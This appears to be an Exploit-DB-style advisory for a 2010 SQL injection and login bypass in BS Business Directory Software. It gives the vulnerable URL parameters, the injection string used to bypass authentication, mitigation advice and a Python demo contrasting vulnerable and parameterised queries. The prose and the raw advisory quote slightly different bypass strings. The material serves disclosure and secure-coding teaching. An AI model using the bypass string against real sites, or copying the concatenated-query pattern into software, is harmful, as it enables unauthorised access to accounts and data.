Vendor: BS Business Directory Software
By: Sid3^effects aKa HaRi
CVSS: 9.3 (HIGH)
CWE: 89 (SQL Injection)
Product Name: BS Business Directory Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2010

Bs Business_Directory Script Sqli Vulnerability

BS Business Directory Software allows people to browse and search for businesses in their area. The listings are fully detailed with descriptions, ratings, features, photos, reviews, contact information and driving directions linked to MapQuest. Users can also open an account and save their favorite businesses to their online notebook. Business people can also list their businesses. After registration, they are able to select and buy a package depending on the length of time they would like their business to be listed. Payment can be made through PayPal or 2Checkout. Subscribers are informed about their statistics via email 10 days, 5 days and 1 day before their account expires. 24 hours after the account expiration date, all of the subscriber's listings and the account itself are deleted automatically. An attacker can exploit the SQL injection vulnerability by sending malicious SQL to the database through the vulnerable URL parameters (the c parameter of search.php and the id parameter of info.php). An attacker can also bypass authentication by using 'or'1'='1 as both the username and password.

Mitigation:

User-supplied values such as the c and id parameters should be validated and passed to the database as bound query parameters rather than concatenated into SQL text. The login check should be implemented the same way, so that quote characters in the submitted username or password cannot alter the query and bypass authentication.
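The following Python script is an added illustration of the mitigation above; it is not code from BS Business Directory Software (which is PHP) and its users/listings schema is hypothetical. It contrasts a login check that splices input into the SQL text with one that binds the values as parameters, and shows the same treatment for the search category and listing id parameters named in the advisory. The bypass string is the one from the Exploit-DB text below.

```python
import sqlite3

# Constructed stand-in for the directory's user and listing tables (assumption:
# the real product's schema is not on the page; this one is hypothetical).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.execute("CREATE TABLE listings (id INTEGER PRIMARY KEY, category TEXT, name TEXT)")
    conn.executemany("INSERT INTO listings VALUES (?, ?, ?)",
                     [(1, "restaurants", "Corner Diner"), (2, "plumbing", "Pipes R Us")])
    return conn

# The auth-bypass string quoted in the advisory.
BYPASS = "' or 1=1 or ''='"

def login_concat(conn, username, password):
    """Vulnerable pattern: user input is spliced into the SQL text, so quotes
    in the input become part of the query's logic and the WHERE clause is
    rewritten to be always true."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_param(conn, username, password):
    """Hardened pattern: the SQL text is fixed and the values are bound as
    parameters, so the input is compared literally and cannot change the
    WHERE clause. (Password storage is simplified for the demo; a real check
    compares a salted hash, but that does not change the query construction.)"""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def search_listings(conn, category):
    """Counterpart of search.php?c=: the category from the URL is bound as a
    parameter, so SQL syntax in it matches nothing instead of being executed."""
    rows = conn.execute("SELECT name FROM listings WHERE category = ?", (category,))
    return [name for (name,) in rows]

def listing_by_id(conn, raw_id):
    """Counterpart of info.php?id=: allowlist-validate the id as a decimal
    integer before it reaches the query, then bind it as a parameter."""
    if not raw_id.isdigit():
        return None
    return conn.execute("SELECT id, category, name FROM listings WHERE id = ?",
                        (int(raw_id),)).fetchone()

if __name__ == "__main__":
    db = build_db()
    print("concat login with bypass string:", login_concat(db, BYPASS, BYPASS))       # True
    print("param login with bypass string:", login_param(db, BYPASS, BYPASS))         # False
    print("param login with real credentials:", login_param(db, "alice", "correct-horse"))  # True
    print("search with bypass string:", search_listings(db, BYPASS))                  # []
    print("id '2 or 1=1' rejected:", listing_by_id(db, "2 or 1=1"))                   # None
```

The point to take from the contrast is that the concatenating version accepts the bypass string with no valid credentials at all, while the parameterised version treats the identical input as an ordinary (non-matching) username, and the integer allowlist rejects non-numeric id values before any query is built.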

Exploit-DB raw data:

1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name :  Bs Business_Directory Script Sqli Vulnerability
Date : July 5, 2010
Critical Level 	: HIGH
vendor URL :http://www.brotherscripts.com/
Price:$24.95
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description : 
BS Business Directory Software allows people to browse and search for businesses in their area. The listings are fully detailed with descriptions, ratings, features, photos, reviews, contact information and driving directions linked to MapQuest. Users can also open an account and save their favorite businesses to their online note book.
Business people can also list their businesses. After the registration, they are able to select and buy a package depending on the length of time they would like their business to be listed. Payment can be made through PayPal or 2Checkout. The subscribers will be informed about their statistics via email - 10 days before the expiration of his account, 5 days, 1 day. 24 hours after his account expiration date, all his listings and his account will be deleted automatically.

#######################################################################################################
Xploit :SQli Vulnerability

DEMO URL 1:http://server/Business_Directory/search.php?c=[sqli]

DEMO URL 2:http://server/Business_Directory/info.php?id=[sqli]

###############################################################################################################
Xploit : Auth Bypass 

Use  ' or 1=1 or ''='  in both username and password :) 

###############################################################################################################
# 0day no more 
# Sid3^effects